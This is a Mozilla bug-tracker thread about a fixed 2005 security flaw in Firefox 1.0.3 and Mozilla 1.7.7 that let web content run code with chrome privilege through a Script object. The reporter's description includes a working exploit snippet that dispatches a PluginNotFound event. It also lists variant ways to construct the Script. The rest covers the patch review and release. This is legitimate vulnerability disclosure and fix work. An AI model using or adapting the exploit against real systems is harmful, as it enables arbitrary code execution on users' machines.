Closed
Bug 290908
Opened 19 years ago
Closed 19 years ago
new Script() can access chrome window and run arbitrary code with chrome privilege
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
FIXED
People
(Reporter: moz_bug_r_a4, Assigned: brendan)
References
Details
(Keywords: fixed-aviary1.0.4, fixed1.7.8, Whiteboard: [sg:fix] trunk version rolled into 281988)
Attachments
(4 files)
622 bytes,
text/html
|
Details | |
825 bytes,
text/html
|
Details | |
675 bytes,
text/html
|
Details | |
1.23 KB,
patch
|
shaver
:
review+
dbaron
:
superreview+
asa
:
approval-aviary1.0.4+
brendan
:
approval1.7.8+
|
Details | Diff | Splinter Review |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 Firefox 1.0.3: missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another event handler that can be used to make chrome access non-DOM JS property (related to Bug 289961). Mozilla 1.7.7: hrefForClickEvent (in contentAreaClick.js) is the function that can be used to make chrome access non-DOM JS property (related to Bug 290324). There is the way to circumvent the fix represented in bug 289074 comment 79. The code in Script object can access |arguments.callee.__parent__| that is the chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome privilege. Exploit: var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';"; var script = (function() { function x() { new Object(); } return new Script(scriptCode); })(); document.body.__defineGetter__("type", script); var event = document.createEvent("Events"); event.initEvent("PluginNotFound", true, true); document.body.dispatchEvent(event); note: It is important that how to create Script object. A, B, and C cause this error: "Error: arguments is not defined". I don't know why D can access |arguments|. A) var script = new Script(scriptCode); B) var script = (function() { return new Script(scriptCode); })(); C) var script = (function() { function x() { "a"; } return new Script(scriptCode); })(); D) // any Object (window, document, new Array(), ...) var anyObj = new Object(); var script = (function() { function x() { anyObj; } return new Script(scriptCode); })(); I have confirmed that the following testcases work in: [Firefox] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 [Mozilla Suite] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Reproducible: Always Steps to Reproduce:
Reporter | ||
Comment 1•19 years ago
|
||
for Firefox/1.0.3
Reporter | ||
Comment 2•19 years ago
|
||
for Mozilla/1.7.7
Reporter | ||
Comment 3•19 years ago
|
||
each of the ways to create Script object
Assignee | ||
Comment 4•19 years ago
|
||
Testcase 1 is quite clever. Another bounty for moz_bug_r_a4! The patch in bug 290324 stops testcase 2. Testcase 3 merely shows how to get an outer function invocation to have an activation (Call in SpiderMonkey) object: nest an inner function that uses a non-local identifier. /be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4) > The patch in bug 290324 stops testcase 2. No, it's the suite version of testcase 1.
Assignee | ||
Comment 6•19 years ago
|
||
Er, dbaron points out that testcase 2 is for the suite. It's the suite version of testcase 1, I guess. More tomorrow. Thanks again, moz_bug_r_a4. /be
Status: NEW → ASSIGNED
Updated•19 years ago
|
Comment 7•19 years ago
|
||
the more js can interact with chrome, the more exploits. especially if chrome executes js.
Assignee | ||
Comment 8•19 years ago
|
||
Attachment #181234 -
Flags: superreview?(dbaron)
Attachment #181234 -
Flags: review?(jst)
Attachment #181234 -
Flags: approval1.7.8?
Attachment #181234 -
Flags: approval-aviary1.0.4?
Assignee | ||
Comment 9•19 years ago
|
||
Comment on attachment 181234 [details] [diff] [review] fix jst, feel free to review too. /be
Attachment #181234 -
Flags: review?(jst) → review?(shaver)
Comment on attachment 181234 [details] [diff] [review] fix r=shaver
Attachment #181234 -
Flags: review?(shaver) → review+
Assignee | ||
Comment 11•19 years ago
|
||
Thanks to bz for some productive discussion, part of which suggested this patch. /be
Comment on attachment 181234 [details] [diff] [review] fix I really don't understand this anymore, but sr=dbaron.
Attachment #181234 -
Flags: superreview?(dbaron) → superreview+
Updated•19 years ago
|
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Updated•19 years ago
|
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988
Updated•19 years ago
|
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
Assignee | ||
Comment 13•19 years ago
|
||
Comment on attachment 181234 [details] [diff] [review] fix Got dveditz and drivers approval on IRC. Checking in, with the same change to obj_eval (indirect call error). /be
Attachment #181234 -
Flags: approval1.7.8?
Attachment #181234 -
Flags: approval1.7.8+
Attachment #181234 -
Flags: approval-aviary1.0.4?
Attachment #181234 -
Flags: approval-aviary1.0.4+
Assignee | ||
Comment 14•19 years ago
|
||
Checked into branches. /be
Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED
Updated•19 years ago
|
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+
Updated•19 years ago
|
Attachment #181234 -
Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
Comment 15•19 years ago
|
||
other than the attached test cases, are there other areas or things we could test to ensure that this didn't regress anything? thanks!
Comment 16•19 years ago
|
||
In Firefox 1.0.4/winxp, I am getting the following for testcase 3: A) ReferenceError: arguments is not defined B) ReferenceError: arguments is not defined C) ReferenceError: arguments is not defined D) [object Object] was D) supposed to be fixed?
Updated•19 years ago
|
Keywords: fixed-aviary1.0.4,
fixed1.7.8
Comment 17•19 years ago
|
||
Clearing security flag from announced vulnerabilities fixed in Firefox 1.0.4/Mozilla 1.7.8
Group: security
Updated•18 years ago
|
Flags: testcase+
Updated•17 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•